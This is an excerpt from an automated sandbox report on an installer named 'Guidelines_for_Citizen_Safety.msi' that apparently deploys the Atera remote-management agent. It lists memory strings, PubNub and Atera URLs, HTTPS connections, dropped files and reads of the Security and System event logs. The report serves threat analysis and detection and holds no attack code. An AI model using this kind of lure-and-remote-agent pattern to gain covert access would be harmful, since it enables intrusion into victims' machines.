                              Source: AteraAgent.exe, 0000000F.00000002.2638383365.00000188977FC000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188978BF000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.0000018897806000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackageswin/AgentPackageRuntimeInstaller/13.0/AgentPackageRuntimeInstaller
                              Source: AteraAgent.exe, 0000000F.00000002.2638383365.00000188977DC000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188978D3000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188978C3000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188977FC000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188978BF000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.0000018897701000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackageswin/AgentPackageTaskScheduler/13.1/AgentPackageTaskScheduler.zip
                              Source: AteraAgent.exe, 0000000F.00000002.2638383365.0000018897701000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackageswin/AgentPackageWindowsUpdate/18.3/AgentPackageWindowsUpdate.zip
                              Source: AteraAgent.exe, 0000000F.00000002.2638383365.0000018897FD3000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.0000018897C55000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.pndsn
                              Source: AteraAgent.exe, 0000000F.00000002.2638383365.0000018897FD3000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.000001889778F000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.0000018897F00000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.0000018897C55000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.pndsn.com
                              Source: AteraAgent.exe, 0000000F.00000002.2638383365.00000188979FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.pndsn.com/time/0?pnsdk=NET45CSharp6.13.0.0&requestid=03f53b61-ad6b-486d-8509-b0e195faf765
                              Source: AteraAgent.exe, 0000000F.00000002.2638383365.00000188978D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.pndsn.com/time/0?pnsdk=NET45CSharp6.13.0.0&requestid=19414362-703b-464a-b6c7-07f45d92c533
                              Source: AteraAgent.exe, 0000000F.00000002.2638383365.0000018897C55000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.pndsn.com/time/0?pnsdk=NET45CSharp6.13.0.0&requestid=21b072dc-59f8-4574-823e-a233b13880ce
                              Source: AteraAgent.exe, 0000000F.00000002.2638383365.00000188978D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.pndsn.com/time/0?pnsdk=NET45CSharp6.13.0.0&requestid=2a252f8a-196a-412e-bfc9-292322230586
                              Source: AteraAgent.exe, 0000000F.00000002.2638383365.00000188978D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.pndsn.com/time/0?pnsdk=NET45CSharp6.13.0.0&requestid=2bb33ca5-3446-47a7-8747-dbbe274b3fa8
                              Source: AteraAgent.exe, 0000000F.00000002.2638383365.0000018897944000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.pndsn.com/time/0?pnsdk=NET45CSharp6.13.0.0&requestid=7cbe7b17-7f3f-4c8d-9d62-c19102ed6fde
                              Source: AteraAgent.exe, 0000000F.00000002.2638383365.00000188978D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.pndsn.com/time/0?pnsdk=NET45CSharp6.13.0.0&requestid=9d2bb483-a1d5-41c5-b567-c3f48ab6ed2c
                              Source: AteraAgent.exe, 0000000F.00000002.2638383365.00000188978D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.pndsn.com/time/0?pnsdk=NET45CSharp6.13.0.0&requestid=b3f74bb1-6c6f-4d46-bcd1-dababeae95b1
                              Source: AteraAgent.exe, 0000000F.00000002.2638383365.000001889778F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.pndsn.com/time/0?pnsdk=NET45CSharp6.13.0.0&requestid=b619f5c8-c13b-4e86-88e3-ba75e0e2aa5f
                              Source: AteraAgent.exe, 0000000F.00000002.2638383365.00000188978D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.pndsn.com/v2/presence/sub_key/sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f/channel/20
                              Source: AteraAgent.exe, 0000000F.00000002.2638383365.0000018897944000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.pndsn.com/v2/presence/sub_key/sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f/channel/2094f497
                              Source: AteraAgent.exe, 0000000F.00000002.2638383365.000001889778F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.pndsn.com/v2/presence/sub_key/sub-c-a02ceca8-a958-1p
                              Source: AteraAgent.exe, 0000000F.00000002.2638383365.00000188979FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.pndsn.com/v2/presence/sub_key/subX
                              Source: AteraAgent.exe, 0000000F.00000002.2638383365.00000188978D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.pndsn.com/v2/subscrib
                              Source: AteraAgent.exe, 0000000F.00000002.2638383365.0000018897944000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.pndsn.com/v2/subscribe/sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f/2094
                              Source: AteraAgent.exe, 0000000F.00000002.2638383365.0000018897944000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.0000018897806000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.pndsn.com/v2/subscribe/sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f/2094f497-2e94-42f0-b27c
                              Source: rundll32.exe, 00000004.00000003.1382870012.0000000004757000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1394167510.0000000004A09000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1454680020.000000000414A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1543865163.00000000044EA000.00000004.00000020.00020000.00000000.sdmp, Guidelines_for_Citizen_Safety.msi, Microsoft.Deployment.WindowsInstaller.dll.4.dr, 6c6863.msi.2.dr, MSI8C79.tmp.2.dr, MSI8B30.tmp.2.dr, Microsoft.Deployment.WindowsInstaller.dll.6.dr, 6c6861.msi.2.dr, Microsoft.Deployment.WindowsInstaller.dll.18.dr, MSI8A93.tmp.2.dr, MSI8A82.tmp.2.drString found in binary or memory: https://www.digicert.com/CPS0
                              Source: rundll32.exe, 00000004.00000003.1382870012.0000000004757000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1394167510.0000000004A09000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1454680020.000000000414A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1543865163.00000000044EA000.00000004.00000020.00020000.00000000.sdmp, Newtonsoft.Json.dll.6.dr, Newtonsoft.Json.dll.4.dr, Newtonsoft.Json.dll.5.dr, Newtonsoft.Json.dll.18.drString found in binary or memory: https://www.newtonsoft.com/json
                              Source: Newtonsoft.Json.dll.18.drString found in binary or memory: https://www.newtonsoft.com/jsonschema
                              Source: rundll32.exe, 00000004.00000003.1382870012.0000000004757000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1394167510.0000000004A09000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1454680020.000000000414A000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2644921266.00000188B0072000.00000002.00000001.01000000.0000001C.sdmp, rundll32.exe, 00000012.00000003.1543865163.00000000044EA000.00000004.00000020.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000013.00000002.1778395763.000002AC68ED2000.00000002.00000001.01000000.0000001B.sdmp, Newtonsoft.Json.dll.6.dr, Newtonsoft.Json.dll.4.dr, Newtonsoft.Json.dll.2.dr, Newtonsoft.Json.dll.5.dr, Newtonsoft.Json.dll.15.dr, Newtonsoft.Json.dll.18.drString found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50061 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49981
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49980
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50053
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49932 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50014
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50090 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50057
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50078 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50015
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50022 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50061
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50063
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49980 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50081 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49932
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50087 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49931
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49950 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49972
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49996 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49971
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49971 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50014 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50023
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50022
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50066
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49988 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50069
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50000 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50053 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49981 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50073
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49963
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50063 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50009 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50034 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49972 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50015 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50031
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50034
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50057 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50078
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50081
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50073 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50083
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50041
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49963 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50031 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50066 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50083 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50089 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49910
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49952
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49996
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50009
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49994
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49950
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49952 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49994 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50041 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50087
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50089
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49931 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50000
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50044
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50090
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50023 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50044 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49900
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49988
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50069 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
                              Source: unknownHTTPS traffic detected: 13.232.67.198:443 -> 192.168.2.7:49768 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 13.232.67.198:443 -> 192.168.2.7:49771 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 108.158.75.93:443 -> 192.168.2.7:49796 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 13.232.67.198:443 -> 192.168.2.7:49932 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 13.232.67.198:443 -> 192.168.2.7:49931 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 13.232.67.198:443 -> 192.168.2.7:49963 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 13.232.67.198:443 -> 192.168.2.7:49988 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 13.232.67.198:443 -> 192.168.2.7:49994 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 13.232.67.198:443 -> 192.168.2.7:50000 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 13.232.67.198:443 -> 192.168.2.7:50009 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 13.232.67.198:443 -> 192.168.2.7:50014 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 13.232.67.198:443 -> 192.168.2.7:50015 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 13.232.67.198:443 -> 192.168.2.7:50023 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 13.232.67.198:443 -> 192.168.2.7:50031 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 13.232.67.198:443 -> 192.168.2.7:50066 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 13.232.67.198:443 -> 192.168.2.7:50069 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 13.232.67.198:443 -> 192.168.2.7:50073 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 13.232.67.198:443 -> 192.168.2.7:50078 version: TLS 1.2
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C56C4404C4DEF0DC88E5FCD9F09CB2F1Jump to dropped file
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8EC9B1D0ABBD7F98B401D425828828CE_DEB07B5578A606ED6489DDA2E357A944Jump to dropped file
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\BA74182F76F15A9CF514DEF352303C95Jump to dropped file
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141Jump to dropped file
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2E248BEDDBB2D85122423C41028BFD4Jump to dropped file
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\698460A0B6E60F2F602361424D832905_8BB23D43DE574E82F2BEE0DF0EC47EEBJump to dropped file

                              Spam, unwanted Advertisements and Ransom Demands

                              barindex
                              Reads the Security eventlog
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
                              Reads the System eventlog
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\AlphaAgent
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\6c6861.msiJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI6A36.tmpJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI7013.tmpJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI87B3.tmpJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\inprogressinstallinfo.ipiJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\SourceHash{E732A0D7-A2F2-4657-AC41-B19742648E45}Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI8A82.tmpJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI8A93.tmpJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI8B30.tmpJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI8C79.tmpJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\6c6863.msiJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\6c6863.msiJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIA9F5.tmpJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI6A36.tmp-Jump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI6A36.tmp-\AlphaControlAgentInstallation.dllJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI6A36.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI6A36.tmp-\Newtonsoft.Json.dllJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI6A36.tmp-\System.Management.dllJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI6A36.tmp-\CustomAction.configJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI7013.tmp-Jump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI7013.tmp-\AlphaControlAgentInstallation.dllJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI7013.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI7013.tmp-\Newtonsoft.Json.dllJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI7013.tmp-\System.Management.dllJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI7013.tmp-\CustomAction.configJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI87B3.tmp-Jump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI87B3.tmp-\AlphaControlAgentInstallation.dllJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI87B3.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI87B3.tmp-\Newtonsoft.Json.dllJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI87B3.tmp-\System.Management.dllJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI87B3.tmp-\CustomAction.configJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\InstallUtil.InstallLogJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\698460A0B6E60F2F602361424D832905_8BB23D43DE574E82F2BEE0DF0EC47EEBJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\698460A0B6E60F2F602361424D832905_8BB23D43DE574E82F2BEE0DF0EC47EEBJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141Jump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141Jump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C56C4404C4DEF0DC88E5FCD9F09CB2F1
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C56C4404C4DEF0DC88E5FCD9F09CB2F1
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F2E248BEDDBB2D85122423C41028BFD4
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2E248BEDDBB2D85122423C41028BFD4
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\1A374813EDB1A6631387E414D3E73232
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\1A374813EDB1A6631387E414D3E73232
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\BA74182F76F15A9CF514DEF352303C95
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\BA74182F76F15A9CF514DEF352303C95
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8EC9B1D0ABBD7F98B401D425828828CE_DEB07B5578A606ED6489DDA2E357A944
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8EC9B1D0ABBD7F98B401D425828828CE_DEB07B5578A606ED6489DDA2E357A944
                              Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSIA9F5.tmp-
                              Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSIA9F5.tmp-\AlphaControlAgentInstallation.dll
                              Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSIA9F5.tmp-\Microsoft.Deployment.WindowsInstaller.dll
                              Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSIA9F5.tmp-\Newtonsoft.Json.dll
                              Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSIA9F5.tmp-\System.Management.dll
                              Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSIA9F5.tmp-\CustomAction.config
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\AgentPackageAgentInformation.exe.log
                              Source: C:\Windows\System32\msiexec.exeFile deleted: C:\Windows\Installer\MSI6A36.tmpJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_3_06F100405_3_06F10040
                              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_3_043350B86_3_043350B8
